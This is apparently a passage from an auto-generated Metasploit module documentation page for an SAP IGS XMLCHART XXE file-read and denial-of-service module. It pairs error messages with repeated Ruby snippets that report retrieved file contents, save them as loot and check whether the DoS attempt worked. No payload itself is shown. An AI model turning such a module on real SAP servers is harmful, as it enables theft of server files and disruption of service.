        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
        if result == -1
          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
        elsif result == -2
          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
          return
        elsif result == -3
          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
          return
        end

Here is a relevant code snippet related to the "The server responded successfully but no download link was found in the response, so it is not vulnerable!" error message:

          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
        elsif result == -2
          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
          return
        elsif result == -3
          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
          return
        end

        if !@file_content.to_s.empty?
          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")

Failed to get <FILE> content!


Here is a relevant code snippet related to the "Failed to get <FILE> content!" error message:

        if !@file_content.to_s.empty?
          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
          loot = store_loot('igs.xmlchart.xxe', 'text/plain', @host, @file_content, @file, 'SAP IGS XMLCHART XXE')
          print_good("File: #{@file} saved in: #{loot}")
        else
          print_error("Failed to get #{@file} content!")
        end

      end
    end
  end

Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>


Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:

        port: @port,
        name: name,
        refs: references
      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200

Error <E.CLASS>: <E>


Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

        name: name,
        refs: references
      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
  end

The target responded with a 200 OK response code. The DoS attempt was unsuccessful.


Here is a relevant code snippet related to the "The target responded with a 200 OK response code. The DoS attempt was unsuccessful." error message:

      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
  end

end

Authors


  • Yvan Genuer
  • Vladimir Ivanov

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
